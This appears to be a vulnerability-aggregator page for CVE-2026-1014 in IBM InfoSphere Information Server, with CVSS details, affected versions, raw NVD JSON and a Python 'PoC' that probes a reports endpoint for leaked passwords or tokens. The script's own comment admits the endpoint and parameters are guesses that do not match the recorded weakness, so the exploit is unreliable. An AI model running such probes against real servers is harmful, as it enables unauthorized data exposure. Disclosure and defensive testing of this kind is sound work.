Security Vulnerability Report
CVE-2026-1014 CVSS 6.5 MEDIUM

CVE-2026-1014

Published: 2026-03-25 21:16:28
Last Modified: 2026-03-26 18:16:38

Description

IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is vulnerable to exposure of sensitive information via JSON server response manipulation.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
IBM InfoSphere Information Server 11.7.0.0
IBM InfoSphere Information Server 11.7.0.1
IBM InfoSphere Information Server 11.7.0.2
IBM InfoSphere Information Server 11.7.0.3
IBM InfoSphere Information Server 11.7.0.4
IBM InfoSphere Information Server 11.7.0.5
IBM InfoSphere Information Server 11.7.1.0
IBM InfoSphere Information Server 11.7.1.1
IBM InfoSphere Information Server 11.7.1.2
IBM InfoSphere Information Server 11.7.1.3
IBM InfoSphere Information Server 11.7.1.4
IBM InfoSphere Information Server 11.7.1.5
IBM InfoSphere Information Server 11.7.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
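import requests
import json

# Key names whose presence in a response body is treated as a hint of
# sensitive data. Matching is case-insensitive (see _find_sensitive_keys).
SENSITIVE_KEYS = ["password", "secret", "token", "admin", "internalConfig"]

# Per-request timeout in seconds, so the script cannot hang indefinitely on
# an unresponsive host.
REQUEST_TIMEOUT = 10


def _find_sensitive_keys(data, sensitive_keys=SENSITIVE_KEYS):
    """
    Return the entries of *sensitive_keys* that occur in the textual form
    of *data*.

    Both the haystack (``str(data)``) and each key are lowercased, so
    mixed-case names such as "internalConfig" can match. This is a plain
    substring search over the whole serialized response, so a hit is only
    a hint ("admin" also matches "administrator"), not proof of disclosure.
    """
    haystack = str(data).lower()
    return [key for key in sensitive_keys if key.lower() in haystack]


def check_cve_2026_1014(target_url, username, password):
    """
    PoC for CVE-2026-1014: IBM InfoSphere Information Server Sensitive
    Information Disclosure.

    Logs in with a low-privilege account, requests the reports endpoint with
    extra query parameters, prints the JSON body, and reports whether any of
    SENSITIVE_KEYS appears in it. All results go to stdout; returns None.

    NOTE(review): the NVD record for this CVE carries CWE-319 and the vendor
    advisory does not describe the endpoint or parameters probed below; they
    are the script author's hypotheses rather than confirmed details.

    Args:
        target_url: Base URL of the server (scheme, host, port); the endpoint
            paths are appended with a leading "/".
        username: Account used for the login step.
        password: Password for *username*.
    """
    session = requests.Session()

    # Step 1: Authenticate with low-privilege user
    login_payload = {"username": username, "password": password}
    try:
        print("[*] Attempting to login...")
        login_resp = session.post(
            f"{target_url}/auth/login",
            json=login_payload,
            timeout=REQUEST_TIMEOUT,
        )
        if login_resp.status_code != 200:
            print("[-] Login failed.")
            return
        print("[+] Login successful.")

        # Step 2: Send request to the endpoint with extra parameters.
        # The parameters attempt to elicit verbose/debug output in the JSON
        # response; whether the server honours them is not established here.
        vulnerable_endpoint = f"{target_url}/api/isp/servlet/reports"
        exploit_payload = {
            "action": "getDetails",
            "id": "1",
            "verbose": "true",  # Attempting to trigger verbose output
            "debug": "on",  # Attempting to trigger debug mode
        }
        print(f"[*] Sending payload to {vulnerable_endpoint}...")
        response = session.get(
            vulnerable_endpoint,
            params=exploit_payload,
            timeout=REQUEST_TIMEOUT,
        )

        if response.status_code == 200:
            try:
                data = response.json()
                print("[+] Received JSON response:")
                print(json.dumps(data, indent=2))
                found_keys = _find_sensitive_keys(data)
                if found_keys:
                    print(f"[!] Potential sensitive information disclosed: {found_keys}")
                else:
                    print("[-] No obvious sensitive data found in this attempt.")
            except ValueError:
                # response.json() raises ValueError on a non-JSON body.
                print("[-] Response was not valid JSON.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.RequestException as e:
        # Network-level failures (connection refused, timeout, ...). Other
        # exceptions are programming errors and are left to propagate.
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target details for testing
    target = "http://target-infosphere-server:9080"
    user = "testuser"
    pwd = "testpass"
    check_cve_2026_1014(target, user, pwd)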

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1014", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:28.123", "lastModified": "2026-03-26T18:16:38.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is vulnerable to exposure of sensitive information via JSON server response manipulation."}, {"lang": "es", "value": "IBM InfoSphere Information Server 11.7.0.0 hasta 11.7.1.6 es vulnerable a la exposición de información sensible a través de la manipulación de la respuesta del servidor JSON."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.7.0.0", "versionEndIncluding": "11.7.1.6", "matchCriteriaId": "65FBF88B-61F0-4D42-A290-453FDC874D7F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7266736", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}